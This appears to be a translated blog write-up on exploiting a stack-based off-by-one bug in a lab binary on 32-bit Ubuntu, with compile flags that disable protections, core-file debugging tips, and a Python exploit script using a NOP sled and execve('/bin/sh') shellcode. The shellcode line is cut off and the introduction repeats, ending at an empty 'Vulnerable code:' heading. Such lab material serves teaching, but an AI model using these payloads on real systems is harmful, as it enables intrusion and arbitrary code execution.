Off-By-One vulnerability (stack based)
Original address: https://bbs.pediy.com/thread-216954.htm
What is off by one?
Copying source string to destination buffer may cause off by one
1. The length of the source string is equal to the length of the destination buffer.
When the source string length is equal to the destination buffer length, a single NULL byte will be copied above the destination buffer. Here since the destination buffer is on the stack, a single NULL byte can overwrite the least significant bit (LSB) of the caller's EBP stored on the stack, which could lead to arbitrary code execution.
Well defined as always, let's take a look at the exploit code off by one!
I'm too lazy to paste it, let's look at the original text and explain only part of it.
This full text explains it very clearly, I only talk about the pits I encountered during the debugging process.
The first is that this uses the core file debugging, compile optionsgcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c
Please note that if the -g option is not used, then it will not be debug mode. Without debug mode, there is no way to break the source code when debugging, so you can only use the core file.
The author also gave the method to debug using the core file, but after I run Python exp.py, there is no core file. After querying the data and using the ulimit -c command to query, it is found that the value is 0. It turns out that the system default (?) does not allow the creation of core files. To modify the limit, use ulimit -c 1000 to modify
After modification, the core file is generated normally.
Another pitfall is that the buf address debugged by gdb is not the same as the buf address of the real running release version, and the offset also changes, which requires special attention.
Or the old rules, share the exp.py file that I successfully debugged
1 #exp.py 2 #!/usr/bin/env python 3 import struct 4 from subprocess import call 5 6 #Spawn a shell. 7 #execve(/bin/sh) Size- 28 bytes. 8 scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\$ 9 10 ret_addr = 0xbffff426 11 12 #endianess conversion 13 def conv(num): 14 return struct.pack("<I",num)#turn Address + NOP's + Shellcode + J$ 15 buf = "A" * 68 16 buf += conv(ret_addr) 17 buf += "\x90" * 30 18 buf += scode 19 buf += "A" * 126 20 21 print "Calling vulnerable program" 22 call(["./vuln", buf])
Off-By-One vulnerability (stack based)
Virtual Machine Installation: Ubuntu 12.04 (x86)
What is off by one?
Copying source string to destination buffer may cause off by one
1. The length of the source string is equal to the length of the destination buffer.
When the source string length is equal to the destination buffer length, a single NULL byte will be copied above the destination buffer. Here since the destination buffer is on the stack, a single NULL byte can overwrite the least significant bit (LSB) of the caller's EBP stored on the stack, which could lead to arbitrary code execution.
Well defined as always, let's take a look at the exploit code off by one!
Vulnerable code: